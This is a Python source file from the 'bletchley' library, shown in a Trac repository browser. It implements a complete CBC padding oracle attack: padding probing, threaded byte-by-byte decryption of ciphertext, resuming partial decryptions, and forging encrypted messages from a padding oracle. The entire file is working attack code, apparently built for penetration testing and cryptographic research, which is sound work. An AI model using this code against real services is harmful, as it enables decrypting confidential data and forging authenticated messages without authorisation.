source: trunk/lib/bletchley/CBC/__init__.py @ 37

Last change on this file since 37 was 37, checked in by tmorgan, 11 years ago

fixed problem with decrypt function when starting with partially completed decryption

File size: 13.0 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
class POA:
    """This class implements padding oracle attacks given a ciphertext and
    function that acts as a padding oracle.

    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
    This attack was first described in:
     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
      WTLS" by Serge Vaudenay (2002)

    POA objects are not caller thread-safe.  If multiple threads need to work
    simultaneously on the same ciphertext and oracle, create a
    separate instance. POA objects can execute tasks internally using
    multiple threads, however.

    All buffers (ciphertext, IV, blocks, known plaintext) are byte strings:
    ``str`` on Python 2, ``bytes`` on Python 3.

    """

    ## private
    _thread_result = None
    _oracle = None
    _ciphertext = None
    _iv = None

    ## protected (reading ok, changing not ok)
    block_size = None

    ## public (r/w ok)
    decrypted = None
    threads = None
    log_fh = None

    def __init__(self, oracle, block_size, ciphertext, iv=None,
                 threads=1, decrypted=b'', log_file=None):
        """Creates a new padding oracle attack (POA) object.

        Arguments:
        oracle -- A function which returns True if the given ciphertext
         results in a correct padding upon decryption and False
         otherwise.  This function should implement the prototype:
           def myOracle(ciphertext, iv): ...
         If the initialization vector (iv) is unknown or is not included
         in the ciphertext message, it can be ignored in the oracle
         implementation (though some limitations will result from this).

        block_size -- The block size of the ciphertext being attacked.
         Is almost always 8 or 16.

        ciphertext -- The ciphertext to be decrypted

        iv -- The initialization vector associated with the ciphertext.
         If none provided, it is assumed to be a block of 0's

        threads -- The maximum number of parallel threads to use during
         decryption.  If more than one thread is used, then the oracle
         function will be called in parallel.  It should implement any
         internal locking necessary to prevent race conditions where
         applicable.

        decrypted -- If a portion of the plaintext is already known (due
         to a prior, partially successful decryption attempt), then this
         may be used to restart the decryption process where it was
         previously left off.  This argument is assumed to contain the
         final N bytes (for an N-byte argument) of the plaintext; that
         is, the tail of the plaintext.

        log_file -- A Python file object where log messages will be
         written.

        Raises InvalidBlockError if the ciphertext is empty or not a
        multiple of block_size, or if a supplied iv is not a multiple of
        block_size.

        """

        if len(ciphertext) % block_size != 0 or len(ciphertext) < block_size:
            raise InvalidBlockError(block_size, len(ciphertext))
        if iv is not None and len(iv) % block_size != 0:
            raise InvalidBlockError(block_size, len(iv))

        self.block_size = block_size
        self.decrypted = decrypted
        self.threads = threads
        self.log_fh = log_file

        self._oracle = oracle
        self._ciphertext = ciphertext
        if iv is None:
            self._iv = b'\x00' * self.block_size
        else:
            self._iv = iv


    def log_message(self, s):
        """Writes s plus a newline to the log file, if one was supplied."""
        if self.log_fh is not None:
            self.log_fh.write(s + '\n')


    @staticmethod
    def _xor_byte(buf, index, mask):
        """Returns a copy of buf with the byte at index XORed with mask."""
        tweaked = bytearray(buf)
        tweaked[index] ^= mask
        return bytes(tweaked)


    def probe_padding(self, prior, final):
        """Attempts to verify that a CBC padding oracle exists and then determines the
        pad value.

        Arguments:
        prior -- Ciphertext block (or IV) preceding the final block
        final -- Final ciphertext block, whose plaintext carries the pad

        On success the pad string is also stored in self.decrypted.

        Returns the pad string, or None on failure.
        XXX: Currently only works for PKCS 5/7.
        """

        ret_val = None

        # First probe for beginning of pad: corrupt one plaintext byte at
        # a time, left to right.  The first corruption the oracle rejects
        # marks the start of the pad.  The last byte is never probed; if
        # nothing before it is rejected the pad is a single byte.
        pad_length = 1
        for i in range(0 - self.block_size, -1):
            probe = self._xor_byte(prior, i, 0xFF)
            if not self._oracle(self._ciphertext + probe + final, self._iv):
                pad_length = 0 - i
                break

        self.log_message("Testing suspected pad length: %d" % pad_length)
        if pad_length > 1:
            # Verify suspected pad length by changing last pad byte to 1
            # and making sure the padding succeeds
            probe = self._xor_byte(prior, -1, pad_length ^ 1)
            if self._oracle(self._ciphertext + probe + final, self._iv):
                ret_val = buffertools.pkcs7Pad(pad_length)

        else:
            # Verify by changing pad byte to 2 and brute-force changing
            # second-to-last byte to 2 as well
            base = self._xor_byte(prior, -1, 2 ^ 1)
            # j == 0 must be tried too: it is the matching value when the
            # second-to-last plaintext byte already happens to be 2.
            for j in range(0, 256):
                probe = self._xor_byte(base, -2, j)
                if self._oracle(self._ciphertext + probe + final, self._iv):
                    # XXX: Save the decrypted byte for later
                    ret_val = buffertools.pkcs7Pad(pad_length)
                    # No need to keep querying the oracle once verified
                    break

        if ret_val:
            self.decrypted = ret_val

        return ret_val


    # XXX: This could be generalized as a byte probe utility for a variety of attacks
    def _test_value_set(self, prefix, suffix, value_set):
        """Thread worker: tries each byte value in value_set between prefix
        and suffix, recording the first value the oracle accepts in
        self._thread_result.
        """
        for b in value_set:
            if self._thread_result is not None:
                # Stop if another thread found the result
                break
            if self._oracle(bytes(prefix + struct.pack("B", b) + suffix), self._iv):
                self._thread_result = b
                break


    def decrypt_next_byte(self, prior, block, known_bytes):
        """Decrypts one byte of ciphertext by modifying the prior
        ciphertext block at the same relative offset.

        Arguments:
        prior -- Ciphertext block appearing prior to the current target
        block -- Currently targeted ciphertext block
        known_bytes -- Bytes in this block already decrypted

        The newly decrypted byte is also prepended to self.decrypted.

        Returns the new byte followed by known_bytes, or known_bytes
        unchanged when the block is already complete.  Raises
        InvalidBlockError if block is not exactly one block long and
        RuntimeError if the oracle accepts none of the 256 candidates.

        """

        if len(block) != self.block_size:
            raise InvalidBlockError(self.block_size, len(block))
        num_known = len(known_bytes)

        if num_known >= self.block_size:
            return known_bytes

        # Pad value the forged block must decrypt to, and the offset of
        # the byte being attacked.
        pad_value = num_known + 1
        target = self.block_size - pad_value

        prior_bytes = bytearray(prior)
        known = bytearray(known_bytes)
        prior_prefix = prior[0:target]
        base = prior_bytes[target]

        # Adjust known bytes to appear as a PKCS 7 pad
        forged = bytearray(prior_bytes[i - num_known] ^ known[i] ^ pad_value
                           for i in range(num_known))
        suffix = bytes(forged) + block

        # Each thread spawned searches a subset of the next byte's
        # 256 possible values.  At least one worker is always started so
        # a thread count of zero cannot silently skip the search.
        worker_count = max(1, min(256, self.threads))
        self._thread_result = None
        workers = []
        for i in range(worker_count):
            t = threading.Thread(target=self._test_value_set,
                                 args=(self._ciphertext + prior_prefix, suffix,
                                       range(i, 256, worker_count)))
            t.start()
            workers.append(t)

        for t in workers:
            t.join()

        if self._thread_result is None:
            self.log_message("Value of a byte could not be determined.  Current plaintext suffix: "+ repr(self.decrypted))
            raise RuntimeError("Padding oracle rejected all 256 candidate byte values")

        decrypted = struct.pack("B", self._thread_result ^ base ^ pad_value)
        self.decrypted = decrypted + self.decrypted
        #  Return previous bytes together with current byte
        return decrypted + known_bytes


    def decrypt_block(self, prior, block, last_bytes=b''):
        """Decrypts the block of ciphertext provided as a parameter.

        Arguments:
        prior -- Ciphertext block (or IV) preceding the target block
        block -- Ciphertext block to decrypt
        last_bytes -- Already-known trailing plaintext bytes of this block

        Returns the plaintext of the block.

        """

        # '<' rather than '!=': an over-long last_bytes is returned as-is
        # by decrypt_next_byte and would otherwise loop forever.
        while len(last_bytes) < self.block_size:
            last_bytes = self.decrypt_next_byte(prior, block, last_bytes)

        self.log_message("Decrypted block: %s" % repr(last_bytes))
        return last_bytes


    def _decrypt_preceding(self, blocks, start, partial, decrypted):
        """Decrypts blocks[start] down to blocks[0] and prepends each
        result to decrypted.

        partial holds the already-known tail of blocks[start].  The first
        block uses the IV as its prior block.  A negative start means
        nothing is left to decrypt.
        """
        for i in range(start, -1, -1):
            prior = blocks[i - 1] if i > 0 else self._iv
            decrypted = self.decrypt_block(prior, blocks[i], partial) + decrypted
            partial = b''
        return decrypted


    def decrypt(self):
        """Decrypts the previously supplied ciphertext. If the IV was
        not provided, it assumes a IV of zero bytes.

        If self.decrypted already holds a plaintext tail, decryption
        resumes from there instead of starting over.

        Returns the result of buffertools.stripPKCS7Pad on the decrypted
        buffer (presumably the plaintext with its pad removed).  Raises
        RuntimeError if the padding of the final block cannot be
        determined.

        """

        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)

        if len(self.decrypted) == 0:
            final = blocks[-1]
            if len(blocks) == 1:
                # If only one block present, then try to use IV as prior
                prior = self._iv
            else:
                prior = blocks[-2]

            # Decrypt last block, starting with padding (quicker to decrypt)
            pad_bytes = self.probe_padding(prior, final)
            if pad_bytes is None:
                # XXX: custom exception
                raise RuntimeError("Unable to determine the padding of the final block")

            decrypted = self.decrypt_block(prior, final, pad_bytes)

            # Now decrypt every earlier block.  For a single-block
            # ciphertext nothing is left, so the block is not decrypted
            # a second time.
            decrypted = self._decrypt_preceding(blocks, len(blocks) - 2,
                                                b'', decrypted)

        # Start where we left off last
        # XXX: test this more
        else:
            num_partial = len(self.decrypted) % self.block_size
            finished_blocks = len(self.decrypted) // self.block_size
            partial = self.decrypted[0:num_partial]
            decrypted = self.decrypted[num_partial:]

            # The partially decrypted block may be the first block, and
            # everything may already be finished; both cases are handled
            # by the helper.
            decrypted = self._decrypt_preceding(blocks,
                                                len(blocks) - 1 - finished_blocks,
                                                partial, decrypted)

        return buffertools.stripPKCS7Pad(decrypted, self.block_size, self.log_fh)


    def encrypt_block(self, plaintext, ciphertext):
        """Encrypts a block of plaintext.  This is accomplished by
        decrypting the supplied ciphertext and then computing the prior
        block needed to create the desired plaintext at the ciphertext's
        location.

        Returns the calculated prior block and the provided ciphertext
        block as a tuple.

        Raises InvalidBlockError if either argument is not exactly one
        block long.

        """
        if len(plaintext) != self.block_size:
            raise InvalidBlockError(self.block_size, len(plaintext))
        if len(ciphertext) != self.block_size:
            raise InvalidBlockError(self.block_size, len(ciphertext))

        # decrypt_block() prepends every recovered byte to self.decrypted.
        # Those bytes belong to the forged block, not to the original
        # message, so the recorded plaintext is restored afterwards.
        saved = self.decrypted
        try:
            ptext = self.decrypt_block(b'\x00' * self.block_size, ciphertext)
        finally:
            self.decrypted = saved

        prior = buffertools.xorBuffers(ptext, plaintext)
        return prior, ciphertext


    def encrypt(self, plaintext):
        """Encrypts a plaintext value through "CBC-R" style prior-block
        propagation.

        Returns a tuple of the IV and ciphertext.

        NOTE: If your target messages do not include an IV with the
        ciphertext, you can instead opt to encrypt a suffix of the
        message and include the IV in the middle of the ciphertext as
        if it were an encrypted block. This one block alone will decrypt
        to an uncontrollable random value, but with careful placement,
        this might be ok.

        """

        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size),
                                         self.block_size)

        if (len(self.decrypted) >= self.block_size
            and len(self._ciphertext) >= 2 * self.block_size):
            # If possible, reuse work from prior decryption efforts on original
            # message for last block
            old_prior = self._ciphertext[0 - self.block_size * 2:0 - self.block_size]
            final_plaintext = self.decrypted[0 - self.block_size:]
            prior = buffertools.xorBuffers(old_prior,
                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
            ciphertext = self._ciphertext[0 - self.block_size:]
        else:
            # Otherwise, select a random last block and generate the prior block
            ciphertext = struct.pack("B" * self.block_size,
                                     *[random.getrandbits(8) for _ in range(self.block_size)])
            prior, ciphertext = self.encrypt_block(blocks[-1], ciphertext)

        # Continue generating all prior blocks
        for i in range(len(blocks) - 2, -1, -1):
            prior, cblock = self.encrypt_block(blocks[i], prior)
            ciphertext = cblock + ciphertext

        # prior as IV
        return bytes(prior), bytes(ciphertext)
Note: See TracBrowser for help on using the repository browser.